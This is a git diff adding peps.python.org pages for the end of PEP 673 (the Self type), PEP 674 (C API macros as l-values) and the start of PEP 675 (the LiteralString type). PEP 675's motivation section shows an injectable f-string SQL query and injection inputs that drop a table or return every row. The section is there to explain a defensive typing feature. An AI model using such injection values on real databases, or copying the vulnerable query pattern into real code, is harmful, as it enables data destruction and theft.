+    str_container: Container[str]
+    reveal_type(int_container.set_value(42))  # => Container[int]
+    reveal_type(str_container.set_value("hello"))  # => Container[str]
+
+def object_with_generic_type(
+    container: Container[T], value: T,
+) -> Container[T]:
+    return container.set_value(value)  # => Container[T]
+
+
+

The PEP doesn’t specify the exact type of self.value within the method +set_value. Some type checkers may choose to implement Self types using +class-local type variables with Self = TypeVar(“Self”, +bound=Container[T]), which will infer a precise type T. However, given +that class-local type variables are not a standardized type system feature, it +is also acceptable to infer Any for self.value. We leave this up to +the type checker.

+

Note that we reject using Self with type arguments, such as Self[int]. +This is because it creates ambiguity about the type of the self parameter +and introduces unnecessary complexity:

+
class Container(Generic[T]):
+    def foo(
+        self, other: Self[int], other2: Self,
+    ) -> Self[str]:  # Rejected
+        ...
+
+
+

In such cases, we recommend using an explicit type for self:

+
class Container(Generic[T]):
+    def foo(
+        self: Container[T],
+        other: Container[int],
+        other2: Container[T]
+    ) -> Container[str]: ...
+
+
+
+
+

Use in Protocols

+

Self is valid within Protocols, similar to its use in classes:

+
from typing import Protocol, Self
+
+class ShapeProtocol(Protocol):
+    scale: float
+
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+

is treated equivalently to:

+
from typing import TypeVar
+
+SelfShape = TypeVar("SelfShape", bound="ShapeProtocol")
+
+class ShapeProtocol(Protocol):
+    scale: float
+
+    def set_scale(self: SelfShape, scale: float) -> SelfShape:
+        self.scale = scale
+        return self
+
+
+

See PEP 544 for +details on the behavior of TypeVars bound to protocols.

+

Checking a class for compatibility with a protocol: If a protocol uses +Self in methods or attribute annotations, then a class Foo is +considered compatible with the protocol if its corresponding methods and +attribute annotations use either Self or Foo or any of Foo’s +subclasses. See the examples below:

+
from typing import Protocol
+
+class ShapeProtocol(Protocol):
+    def set_scale(self, scale: float) -> Self: ...
+
+class ReturnSelf:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+class ReturnConcreteShape:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> ReturnConcreteShape:
+        self.scale = scale
+        return self
+
+class BadReturnType:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> int:
+        self.scale = scale
+        return 42
+
+class ReturnDifferentClass:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> ReturnConcreteShape:
+        return ReturnConcreteShape(...)
+
+def accepts_shape(shape: ShapeProtocol) -> None:
+    y = shape.set_scale(0.5)
+    reveal_type(y)
+
+def main() -> None:
+    return_self_shape: ReturnSelf
+    return_concrete_shape: ReturnConcreteShape
+    bad_return_type: BadReturnType
+    return_different_class: ReturnDifferentClass
+
+    accepts_shape(return_self_shape)  # OK
+    accepts_shape(return_concrete_shape)  # OK
+    accepts_shape(bad_return_type)  # Not OK
+    # Not OK because it returns a non-subclass.
+    accepts_shape(return_different_class)
+
+
+
+
+
+

Valid Locations for Self

+

A Self annotation is only valid in class contexts, and will always refer +to the encapsulating class. In contexts involving nested classes, Self +will always refer to the innermost class.

+

The following uses of Self are accepted:

+
class ReturnsSelf:
+    def foo(self) -> Self: ... # Accepted
+
+    @classmethod
+    def bar(cls) -> Self:  # Accepted
+        return cls()
+
+    def __new__(cls, value: int) -> Self: ...  # Accepted
+
+    def explicitly_use_self(self: Self) -> Self: ...  # Accepted
+
+    # Accepted (Self can be nested within other types)
+    def returns_list(self) -> list[Self]: ...
+
+    # Accepted (Self can be nested within other types)
+    @classmethod
+    def return_cls(cls) -> type[Self]:
+        return cls
+
+class Child(ReturnsSelf):
+    # Accepted (we can override a method that uses Self annotations)
+    def foo(self) -> Self: ...
+
+class TakesSelf:
+    def foo(self, other: Self) -> bool: ...  # Accepted
+
+class Recursive:
+    # Accepted (treated as an @property returning ``Self | None``)
+    next: Self | None
+
+class CallableAttribute:
+    def foo(self) -> int: ...
+
+    # Accepted (treated as an @property returning the Callable type)
+    bar: Callable[[Self], int] = foo
+
+class HasNestedFunction:
+    x: int = 42
+
+    def foo(self) -> None:
+
+        # Accepted (Self is bound to HasNestedFunction).
+        def nested(z: int, inner_self: Self) -> Self:
+            print(z)
+            print(inner_self.x)
+            return inner_self
+
+        nested(42, self)  # OK
+
+
+class Outer:
+    class Inner:
+        def foo(self) -> Self: ...  # Accepted (Self is bound to Inner)
+
+
+

The following uses of Self are rejected.

+
def foo(bar: Self) -> Self: ...  # Rejected (not within a class)
+
+bar: Self  # Rejected (not within a class)
+
+class Foo:
+    # Rejected (Self is treated as unknown).
+    def has_existing_self_annotation(self: T) -> Self: ...
+
+class Foo:
+    def return_concrete_type(self) -> Self:
+        return Foo()  # Rejected (see FooChild below for rationale)
+
+class FooChild(Foo):
+    child_value: int = 42
+
+    def child_method(self) -> None:
+        # At runtime, this would be Foo, not FooChild.
+        y = self.return_concrete_type()
+
+        y.child_value
+        # Runtime error: Foo has no attribute child_value
+
+class Bar(Generic[T]):
+    def bar(self) -> T: ...
+
+class Baz(Bar[Self]): ...  # Rejected
+
+
+

We reject type aliases containing Self. Supporting Self +outside class definitions can require a lot of special-handling in +type checkers. Given that it also goes against the rest of the PEP to +use Self outside a class definition, we believe the added +convenience of aliases is not worth it:

+
TupleSelf = Tuple[Self, Self]  # Rejected
+
+class Alias:
+    def return_tuple(self) -> TupleSelf:  # Rejected
+        return (self, self)
+
+
+

Note that we reject Self in staticmethods. Self does not add much +value since there is no self or cls to return. The only possible use +cases would be to return a parameter itself or some element from a container +passed in as a parameter. These don’t seem worth the additional complexity.

+
class Base:
+    @staticmethod
+    def make() -> Self:  # Rejected
+        ...
+
+    @staticmethod
+    def return_parameter(foo: Self) -> Self:  # Rejected
+        ...
+
+
+

Likewise, we reject Self in metaclasses. Self in this PEP consistently +refers to the same type (that of self). But in metaclasses, it would have +to refer to different types in different method signatures. For example, in +__mul__, Self in the return type would refer to the implementing class +Foo, not the enclosing class MyMetaclass. But, in __new__, Self +in the return type would refer to the enclosing class MyMetaclass. To +avoid confusion, we reject this edge case.

+
class MyMetaclass(type):
+    def __new__(cls, *args: Any) -> Self:  # Rejected
+        return super().__new__(cls, *args)
+
+    def __mul__(cls, count: int) -> list[Self]:  # Rejected
+        return [cls()] * count
+
+class Foo(metaclass=MyMetaclass): ...
+
+
+
+
+

Runtime behavior

+

Because Self is not subscriptable, we propose an implementation similar to +typing.NoReturn.

+
@_SpecialForm
+def Self(self, params):
+    """Used to spell the type of "self" in classes.
+
+    Example::
+
+      from typing import Self
+
+      class ReturnsSelf:
+          def parse(self, data: bytes) -> Self:
+              ...
+              return self
+
+    """
+    raise TypeError(f"{self} is not subscriptable")
+
+
+
+
+

Rejected Alternatives

+
+

Allow the Type Checker to Infer the Return Type

+

One proposal is to leave the Self type implicit and let the type checker +infer from the body of the method that the return type must be the same as the +type of the self parameter:

+
class Shape:
+    def set_scale(self, scale: float):
+        self.scale = scale
+        return self  # Type checker infers that we are returning self
+
+
+

We reject this because Explicit Is Better Than Implicit. Beyond that, the +above approach will fail for type stubs, which don’t have method bodies to +analyze.

+
+
+
+

Reference Implementations

+

Mypy: Proof of concept implementation in Mypy.

+

Pyright: v1.1.184

+

Runtime implementation of Self: PR.

+
+
+

Resources

+

Similar discussions on a Self type in Python started in Mypy around 2016: +Mypy issue #1212 - SelfType or +another way to spell “type of self”. However, the approach ultimately taken +there was the bounded TypeVar approach shown in our “before” examples. +Other issues that discuss this include Mypy issue #2354 - Self types in generic +classes.

+
+
Pradeep made a concrete proposal at the PyCon Typing Summit 2021:
recorded talk, slides.
+
+

James brought up the proposal independently on typing-sig: +Typing-sig thread.

+

Other languages have similar ways to express the type of the enclosing class:

+ +

Thanks to the following people for their feedback on the PEP:

+

Jia Chen, Rebecca Chen, Sergei Lebedev, Kaylynn Morgan, Tuomas +Suutari, Eric Traut, Alex Waygood, Shannon Zhu, and Никита Соболев

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0673.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0674/index.html b/pep-0674/index.html new file mode 100644 index 00000000000..eb54ad2e7a2 --- /dev/null +++ b/pep-0674/index.html @@ -0,0 +1,677 @@ + + + + + + + + PEP 674 – Disallow using macros as l-values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 674 – Disallow using macros as l-values

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
30-Nov-2021
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

Disallow using macros as l-values. For example, +Py_TYPE(obj) = new_type now fails with a compiler error.

+

In practice, the majority of affected projects only have to make two +changes:

+
    +
  • Replace Py_TYPE(obj) = new_type +with Py_SET_TYPE(obj, new_type).
  • +
  • Replace Py_SIZE(obj) = new_size +with Py_SET_SIZE(obj, new_size).
  • +
+
+
+

PEP Deferral

+

See SC reply to PEP 674 – Disallow using macros as l-values +(February 2022).

+
+
+

Rationale

+
+

Using a macro as a an l-value

+

In the Python C API, some functions are implemented as macro because +writing a macro is simpler than writing a regular function. If a macro +exposes directly a structure member, it is technically possible to use +this macro to not only get the structure member but also set it.

+

Example with the Python 3.10 Py_TYPE() macro:

+
#define Py_TYPE(ob) (((PyObject *)(ob))->ob_type)
+
+
+

This macro can be used as a r-value to get an object type:

+
type = Py_TYPE(object);
+
+
+

It can also be used as an l-value to set an object type:

+
Py_TYPE(object) = new_type;
+
+
+

It is also possible to set an object reference count and an object size +using Py_REFCNT() and Py_SIZE() macros.

+

Setting directly an object attribute relies on the current exact CPython +implementation. Implementing this feature in other Python +implementations can make their C API implementation less efficient.

+
+
+

CPython nogil fork

+

Sam Gross forked Python 3.9 to remove the GIL: the nogil branch. This fork has no +PyObject.ob_refcnt member, but a more elaborated implementation for +reference counting, and so the Py_REFCNT(obj) = new_refcnt; code +fails with a compiler error.

+

Merging the nogil fork into the upstream CPython main branch requires +first to fix this C API compatibility issue. It is a concrete example of +a Python optimization blocked indirectly by the C API.

+

This issue was already fixed in Python 3.10: the Py_REFCNT() macro +has been already modified to disallow using it as an l-value.

+

These statements are endorsed by Sam Gross (nogil developer).

+
+
+

HPy project

+

The HPy project is a brand new C API for +Python using only handles and function calls: handles are opaque, +structure members cannot be accessed directly, and pointers cannot be +dereferenced.

+

Searching and replacing Py_SET_SIZE() is easier and safer than +searching and replacing some strange macro uses of Py_SIZE(). +Py_SIZE() can be semi-mechanically replaced by HPy_Length(), +whereas seeing Py_SET_SIZE() would immediately make clear that the +code needs bigger changes in order to be ported to HPy (for example by +using HPyTupleBuilder or HPyListBuilder).

+

The fewer internal details exposed via macros, the easier it will be for +HPy to provide direct equivalents. Any macro that references +“non-public” interfaces effectively exposes those interfaces publicly.

+

These statements are endorsed by Antonio Cuni (HPy developer).

+
+
+

GraalVM Python

+

In GraalVM, when a Python object is accessed by the Python C API, the C API +emulation layer has to wrap the GraalVM objects into wrappers that expose +the internal structure of the CPython structures (PyObject, PyLongObject, +PyTypeObject, etc). This is because when the C code accesses it directly or via +macros, all GraalVM can intercept is a read at the struct offset, which has +to be mapped back to the representation in GraalVM. The smaller the +“effective” number of exposed struct members (by replacing macros with +functions), the simpler GraalVM wrappers can be.

+

This PEP alone is not enough to get rid of the wrappers in GraalVM, but it +is a step towards this long term goal. GraalVM already supports HPy which is a better +solution in the long term.

+

These statements are endorsed by Tim Felgentreff (GraalVM Python developer).

+
+
+
+

Specification

+
+

Disallow using macros as l-values

+

The following 65 macros are modified to disallow using them as l-values.

+
+

PyObject and PyVarObject macros

+
    +
  • Py_TYPE(): Py_SET_TYPE() must be used instead
  • +
  • Py_SIZE(): Py_SET_SIZE() must be used instead
  • +
+
+
+

GET macros

+
    +
  • PyByteArray_GET_SIZE()
  • +
  • PyBytes_GET_SIZE()
  • +
  • PyCFunction_GET_CLASS()
  • +
  • PyCFunction_GET_FLAGS()
  • +
  • PyCFunction_GET_FUNCTION()
  • +
  • PyCFunction_GET_SELF()
  • +
  • PyCell_GET()
  • +
  • PyCode_GetNumFree()
  • +
  • PyDict_GET_SIZE()
  • +
  • PyFunction_GET_ANNOTATIONS()
  • +
  • PyFunction_GET_CLOSURE()
  • +
  • PyFunction_GET_CODE()
  • +
  • PyFunction_GET_DEFAULTS()
  • +
  • PyFunction_GET_GLOBALS()
  • +
  • PyFunction_GET_KW_DEFAULTS()
  • +
  • PyFunction_GET_MODULE()
  • +
  • PyHeapType_GET_MEMBERS()
  • +
  • PyInstanceMethod_GET_FUNCTION()
  • +
  • PyList_GET_SIZE()
  • +
  • PyMemoryView_GET_BASE()
  • +
  • PyMemoryView_GET_BUFFER()
  • +
  • PyMethod_GET_FUNCTION()
  • +
  • PyMethod_GET_SELF()
  • +
  • PySet_GET_SIZE()
  • +
  • PyTuple_GET_SIZE()
  • +
  • PyUnicode_GET_DATA_SIZE()
  • +
  • PyUnicode_GET_LENGTH()
  • +
  • PyUnicode_GET_LENGTH()
  • +
  • PyUnicode_GET_SIZE()
  • +
  • PyWeakref_GET_OBJECT()
  • +
+
+
+

AS macros

+
    +
  • PyByteArray_AS_STRING()
  • +
  • PyBytes_AS_STRING()
  • +
  • PyFloat_AS_DOUBLE()
  • +
  • PyUnicode_AS_DATA()
  • +
  • PyUnicode_AS_UNICODE()
  • +
+
+
+

PyUnicode macros

+
    +
  • PyUnicode_1BYTE_DATA()
  • +
  • PyUnicode_2BYTE_DATA()
  • +
  • PyUnicode_4BYTE_DATA()
  • +
  • PyUnicode_DATA()
  • +
  • PyUnicode_IS_ASCII()
  • +
  • PyUnicode_IS_COMPACT()
  • +
  • PyUnicode_IS_READY()
  • +
  • PyUnicode_KIND()
  • +
  • PyUnicode_READ()
  • +
  • PyUnicode_READ_CHAR()
  • +
+
+
+

PyDateTime GET macros

+
    +
  • PyDateTime_DATE_GET_FOLD()
  • +
  • PyDateTime_DATE_GET_HOUR()
  • +
  • PyDateTime_DATE_GET_MICROSECOND()
  • +
  • PyDateTime_DATE_GET_MINUTE()
  • +
  • PyDateTime_DATE_GET_SECOND()
  • +
  • PyDateTime_DATE_GET_TZINFO()
  • +
  • PyDateTime_DELTA_GET_DAYS()
  • +
  • PyDateTime_DELTA_GET_MICROSECONDS()
  • +
  • PyDateTime_DELTA_GET_SECONDS()
  • +
  • PyDateTime_GET_DAY()
  • +
  • PyDateTime_GET_MONTH()
  • +
  • PyDateTime_GET_YEAR()
  • +
  • PyDateTime_TIME_GET_FOLD()
  • +
  • PyDateTime_TIME_GET_HOUR()
  • +
  • PyDateTime_TIME_GET_MICROSECOND()
  • +
  • PyDateTime_TIME_GET_MINUTE()
  • +
  • PyDateTime_TIME_GET_SECOND()
  • +
  • PyDateTime_TIME_GET_TZINFO()
  • +
+
+
+
+

Port C extensions to Python 3.11

+

In practice, the majority of projects affected by these PEP only have to +make two changes:

+
    +
  • Replace Py_TYPE(obj) = new_type +with Py_SET_TYPE(obj, new_type).
  • +
  • Replace Py_SIZE(obj) = new_size +with Py_SET_SIZE(obj, new_size).
  • +
+

The pythoncapi_compat project can be used to +update automatically C extensions: add Python 3.11 support without +losing support with older Python versions. The project provides a header +file which provides Py_SET_REFCNT(), Py_SET_TYPE() and +Py_SET_SIZE() functions to Python 3.8 and older.

+
+
+

PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged

+

The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are left +unchanged.

+

The code patterns &PyTuple_GET_ITEM(tuple, 0) and +&PyList_GET_ITEM(list, 0) are still commonly used to get access to +the inner PyObject** array.

+

Changing these macros is out of the scope of this PEP.

+
+
+

PyDescr_NAME() and PyDescr_TYPE() are left unchanged

+

The PyDescr_NAME() and PyDescr_TYPE() macros are left unchanged.

+

These macros give access to PyDescrObject.d_name and +PyDescrObject.d_type members. They can be used as l-values to set +these members.

+

The SWIG project uses these macros as l-values to set these members. It +would be possible to modify SWIG to prevent setting PyDescrObject +structure members directly, but it is not really worth it since the +PyDescrObject structure is not performance critical and is unlikely +to change soon.

+

See the bpo-46538 “[C API] Make +the PyDescrObject structure opaque: PyDescr_NAME() and PyDescr_TYPE()” +issue for more details.

+
+
+
+

Implementation

+

The implementation is tracked by bpo-45476: [C API] PEP 674: Disallow +using macros as l-values.

+
+

Py_TYPE() and Py_SIZE() macros

+

In May 2020, the Py_TYPE() and Py_SIZE() macros have been +modified to disallow using them as l-values (Py_TYPE, +Py_SIZE).

+

In November 2020, the change was reverted, +since it broke too many third party projects.

+

In June 2021, once most third party projects were updated, a second +attempt +was done, but had to be reverted again +, since it broke test_exceptions on Windows.

+

In September 2021, once test_exceptions has been fixed, +Py_TYPE() and Py_SIZE() were finally changed.

+

In November 2021, this backward incompatible change got a +Steering Council exception.

+

In October 2022, Python 3.11 got released with Py_TYPE() and Py_SIZE() +incompatible changes.

+
+
+
+

Backwards Compatibility

+

The proposed C API changes are backward incompatible on purpose.

+

In practice, only Py_TYPE() and Py_SIZE() macros are used as +l-values.

+

This change does not follow the PEP 387 deprecation process. There is +no known way to emit a deprecation warning only when a macro is used as +an l-value, but not when it’s used differently (ex: as a r-value).

+

The following 4 macros are left unchanged to reduce the number of +affected projects: PyDescr_NAME(), PyDescr_TYPE(), +PyList_GET_ITEM() and PyTuple_GET_ITEM().

+
+

Statistics

+

In total (projects on PyPI and not on PyPI), 34 projects are known to be +affected by this PEP:

+
    +
  • 16 projects (47%) are already fixed
  • +
  • 18 projects (53%) are not fixed yet +(pending fix or have to regenerate their Cython code)
  • +
+

On September 1, 2022, the PEP affects 18 projects (0.4%) of the top 5000 +PyPI projects:

+
    +
  • 15 projects (0.3%) have to regenerate their Cython code
  • +
  • 3 projects (0.1%) have a pending fix
  • +
+
+
+

Top 5000 PyPI

+

Projects with a pending fix (3):

+
    +
  • datatable (1.0.0): +fixed
  • +
  • guppy3 (3.1.2): +fixed
  • +
  • scipy (1.9.3): need to update boost python
  • +
+

Moreover, 15 projects have to regenerate their Cython code.

+

Projects released with a fix (12):

+ +

There are also two backport projects which are affected by this PEP:

+
    +
  • pickle5 (0.0.12): backport for Python <= 3.7
  • +
  • pysha3 (1.0.2): backport for Python <= 3.5
  • +
+

They must not be used and cannot be used on Python 3.11.

+
+
+

Other affected projects

+

Other projects released with a fix (4):

+
    +
  • boost (1.78.0): +commit
  • +
  • breezy (3.2.1): +bug report
  • +
  • duplicity (0.8.18): +commit
  • +
  • gobject-introspection (1.70.0): +MR
  • +
+
+
+
+

Relationship with the HPy project

+
+

The HPy project

+

The hope with the HPy project is to provide a C API that is close +to the original API—to make porting easy—and have it perform as close to +the existing API as possible. At the same time, HPy is sufficiently +removed to be a good “C extension API” (as opposed to a stable subset of +the CPython implementation API) that does not leak implementation +details. To ensure this latter property, the HPy project tries to +develop everything in parallel for CPython, PyPy, and GraalVM Python.

+

HPy is still evolving very fast. Issues are still being solved while +migrating NumPy, and work has begun on adding support for HPy to Cython. Work on +pybind11 is starting soon. Tim Felgentreff believes by the time HPy has +these users of the existing C API working, HPy should be in a state +where it is generally useful and can be deemed stable enough that +further development can follow a more stable process.

+

In the long run the HPy project would like to become a promoted API to +write Python C extensions.

+

The HPy project is a good solution for the long term. It has the +advantage of being developed outside Python and it doesn’t require any C +API change.

+
+
+

The C API is here is stay for a few more years

+

The first concern about HPy is that right now, HPy is not mature nor +widely used, and CPython still has to continue supporting a large amount +of C extensions which are not likely to be ported to HPy soon.

+

The second concern is the inability to evolve CPython internals to +implement new optimizations, and the inefficient implementation of the +current C API in PyPy, GraalPython, etc. Sadly, HPy will only solve +these problems when most C extensions will be fully ported to HPy: +when it will become reasonable to consider dropping the “legacy” Python +C API.

+

While porting a C extension to HPy can be done incrementally on CPython, +it requires to modify a lot of code and takes time. Porting most C +extensions to HPy is expected to take a few years.

+

This PEP proposes to make the C API “less bad” by fixing one problem +which is clearily identified as causing practical issues: macros used as +l-values. This PEP only requires updating a minority of C +extensions, and usually only a few lines need to be changed in impacted +extensions.

+

For example, NumPy 1.22 is made of 307,300 lines of C code, and adapting +NumPy to the this PEP only modified 11 lines (use Py_SET_TYPE and +Py_SET_SIZE) and adding 4 lines (to define Py_SET_TYPE and Py_SET_SIZE +for Python 3.8 and older). The beginnings of the NumPy port to HPy +already required modifying more lines than that.

+

Right now, it’s hard to bet which approach is the best: fixing the +current C API, or focusing on HPy. It would be risky to only focus on +HPy.

+
+
+
+

Rejected Idea: Leave the macros as they are

+

The documentation of each function can discourage developers to use +macros to modify Python objects.

+

If these is a need to make an assignment, a setter function can be added +and the macro documentation can require to use the setter function. For +example, a Py_SET_TYPE() function has been added to Python 3.9 and +the Py_TYPE() documentation now requires to use the +Py_SET_TYPE() function to set an object type.

+

If developers use macros as an l-value, it’s their responsibility when +their code breaks, not Python’s responsibility. We are operating under +the consenting adults principle: we expect users of the Python C API to +use it as documented and expect them to take care of the fallout, if +things break when they don’t.

+

This idea was rejected because only few developers read the +documentation, and only a minority is tracking changes of the Python C +API documentation. The majority of developers are only using CPython and +so are not aware of compatibility issues with other Python +implementations.

+

Moreover, continuing to allow using macros as an l-value does not help +the HPy project, and leaves the burden of emulating them on GraalVM’s +Python implementation.

+
+
+

Macros already modified

+

The following C API macros have already been modified to disallow using +them as l-value:

+
    +
  • PyCell_SET()
  • +
  • PyList_SET_ITEM()
  • +
  • PyTuple_SET_ITEM()
  • +
  • Py_REFCNT() (Python 3.10): Py_SET_REFCNT() must be used
  • +
  • _PyGCHead_SET_FINALIZED()
  • +
  • _PyGCHead_SET_NEXT()
  • +
  • asdl_seq_GET()
  • +
  • asdl_seq_GET_UNTYPED()
  • +
  • asdl_seq_LEN()
  • +
  • asdl_seq_SET()
  • +
  • asdl_seq_SET_UNTYPED()
  • +
+

For example, PyList_SET_ITEM(list, 0, item) < 0 now fails with a +compiler error as expected.

+
+
+

Post History

+ +
+
+

References

+ +
+
+

Version History

+
    +
  • Version 3: No longer change PyDescr_TYPE() and PyDescr_NAME() macros
  • +
  • Version 2: Add “Relationship with the HPy project” section, remove +the PyPy section
  • +
  • Version 1: First public version
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0674.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0675/index.html b/pep-0675/index.html new file mode 100644 index 00000000000..f5f73575c96 --- /dev/null +++ b/pep-0675/index.html @@ -0,0 +1,1307 @@ + + + + + + + + PEP 675 – Arbitrary Literal String Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 675 – Arbitrary Literal String Type

+
+
Author:
+
Pradeep Kumar Srinivasan <gohanpra at gmail.com>, Graham Bleaney <gbleaney at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Nov-2021
+
Python-Version:
+
3.11
+
Post-History:
+
07-Feb-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see LiteralString and +typing.LiteralString for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

There is currently no way to specify, using type annotations, that a +function parameter can be of any literal string type. We have to +specify a precise literal string type, such as +Literal["foo"]. This PEP introduces a supertype of literal string +types: LiteralString. This allows a function to accept arbitrary +literal string types, such as Literal["foo"] or +Literal["bar"].

+
+
+

Motivation

+

Powerful APIs that execute SQL or shell commands often recommend that +they be invoked with literal strings, rather than arbitrary user +controlled strings. There is no way to express this recommendation in +the type system, however, meaning security vulnerabilities sometimes +occur when developers fail to follow it. For example, a naive way to +look up a user record from a database is to accept a user id and +insert it into a predefined SQL query:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = f"SELECT * FROM data WHERE user_id = {user_id}"
+    conn.execute(query)
+    ...  # Transform data to a User object and return it
+
+query_user(conn, "user123")  # OK.
+
+
+

However, the user-controlled data user_id is being mixed with the +SQL command string, which means a malicious user could run arbitrary +SQL commands:

+
 # Delete the table.
+ query_user(conn, "user123; DROP TABLE data;")
+
+ # Fetch all users (since 1 = 1 is always true).
+ query_user(conn, "user123 OR 1 = 1")
+
+
+

To prevent such SQL injection attacks, SQL APIs offer parameterized +queries, which separate the executed query from user-controlled data +and make it impossible to run arbitrary queries. For example, with +sqlite3, our +original function would be written safely as a query with parameters:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = "SELECT * FROM data WHERE user_id = ?"
+    conn.execute(query, (user_id,))
+    ...
+
+
+

The problem is that there is no way to enforce this +discipline. sqlite3’s own documentation can only admonish +the reader to not dynamically build the sql argument from external +input; the API’s authors cannot express that through the type +system. Users can (and often do) still use a convenient f-string as +before and leave their code vulnerable to SQL injection.

+

Existing tools, such as the popular security linter Bandit, +attempt to detect unsafe external data used in SQL APIs, by inspecting +the AST or by other semantic pattern-matching. These tools, however, +preclude common idioms like storing a large multi-line query in a +variable before executing it, adding literal string modifiers to the +query based on some conditions, or transforming the query string using +a function. (We survey existing tools in the Rejected Alternatives +section.) For example, many tools will detect a false positive issue +in this benign snippet:

+
def query_data(conn: Connection, user_id: str, limit: bool) -> None:
+    query = """
+        SELECT
+            user.name,
+            user.age
+        FROM data
+        WHERE user_id = ?
+    """
+    if limit:
+        query += " LIMIT 1"
+
+    conn.execute(query, (user_id,))
+
+
+

We want to forbid harmful execution of user-controlled data while +still allowing benign idioms like the above and not requiring extra +user work.

+

To meet this goal, we introduce the LiteralString type, which only +accepts string values that are known to be made of literals. This is a +generalization of the Literal["foo"] type from PEP 586. +A string of type +LiteralString cannot contain user-controlled data. Thus, any API +that only accepts LiteralString will be immune to injection +vulnerabilities (with pragmatic limitations).

+

Since we want the sqlite3 execute method to disallow strings +built with user input, we would make its typeshed stub +accept a sql query that is of type LiteralString:

+
from typing import LiteralString
+
+def execute(self, sql: LiteralString, parameters: Iterable[str] = ...) -> Cursor: ...
+
+
+

This successfully forbids our unsafe SQL example. The variable +query below is inferred to have type str, since it is created +from a format string using user_id, and cannot be passed to +execute:

+
def query_user(conn: Connection, user_id: str) -> User:
+    query = f"SELECT * FROM data WHERE user_id = {user_id}"
+    conn.execute(query)  # Error: Expected LiteralString, got str.
+    ...
+
+
+

The method remains flexible enough to allow our more complicated +example:

+
def query_data(conn: Connection, user_id: str, limit: bool) -> None:
+    # This is a literal string.
+    query = """
+        SELECT
+            user.name,
+            user.age
+        FROM data
+        WHERE user_id = ?
+    """
+
+    if limit:
+        # Still has type LiteralString because we added a literal string.
+        query += " LIMIT 1"
+
+    conn.execute(query, (user_id,))  # OK
+
+
+

Notice that the user did not have to change their SQL code at all. The +type checker was able to infer the literal string type and complain +only in case of violations.

+

LiteralString is also useful in other cases where we want strict +command-data separation, such as when building shell commands or when +rendering a string into an HTML response without escaping (see +Appendix A: Other Uses). Overall, this combination of strictness +and flexibility makes it easy to enforce safer API usage in sensitive +code without burdening users.

+
+

Usage statistics

+

In a sample of open-source projects using sqlite3, we found that +conn.execute was called ~67% of the time +with a safe string literal and ~33% of the time +with a potentially unsafe, local string variable. Using this PEP’s +literal string type along with a type checker would prevent the unsafe +portion of that 33% of cases (ie. the ones where user controlled data +is incorporated into the query), while seamlessly allowing the safe +ones to remain.

+
+
+
+

Rationale

+

Firstly, why use types to prevent security vulnerabilities?

+

Warning users in documentation is insufficient - most users either +never see these warnings or ignore them. Using an existing dynamic or +static analysis approach is too restrictive - these prevent natural +idioms, as we saw in the Motivation section (and will discuss more +extensively in the Rejected Alternatives section). The typing-based +approach in this PEP strikes a user-friendly balance between +strictness and flexibility.

+

Runtime approaches do not work because, at runtime, the query string +is a plain str. While we could prevent some exploits using +heuristics, such as regex-filtering for obviously malicious payloads, +there will always be a way to work around them (perfectly +distinguishing good and bad queries reduces to the halting problem).

+

Static approaches, such as checking the AST to see if the query string +is a literal string expression, cannot tell when a string is assigned +to an intermediate variable or when it is transformed by a benign +function. This makes them overly restrictive.

+

The type checker, surprisingly, does better than both because it has +access to information not available in the runtime or static analysis +approaches. Specifically, the type checker can tell us whether an +expression has a literal string type, say Literal["foo"]. The type +checker already propagates types across variable assignments or +function calls.

+

In the current type system itself, if the SQL or shell command +execution function only accepted three possible input strings, our job +would be done. We would just say:

+
def execute(query: Literal["foo", "bar", "baz"]) -> None: ...
+
+
+

But, of course, execute can accept any possible query. How do we +ensure that the query does not contain an arbitrary, user-controlled +string?

+

We want to specify that the value must be of some type +Literal[<...>] where <...> is some string. This is what +LiteralString represents. LiteralString is the “supertype” of +all literal string types. In effect, this PEP just introduces a type +in the type hierarchy between Literal["foo"] and str. Any +particular literal string, such as Literal["foo"] or +Literal["bar"], is compatible with LiteralString, but not the +other way around. The “supertype” of LiteralString itself is +str. So, LiteralString is compatible with str, but not the +other way around.

+

Note that a Union of literal types is naturally compatible with +LiteralString because each element of the Union is individually +compatible with LiteralString. So, Literal["foo", "bar"] is +compatible with LiteralString.

+

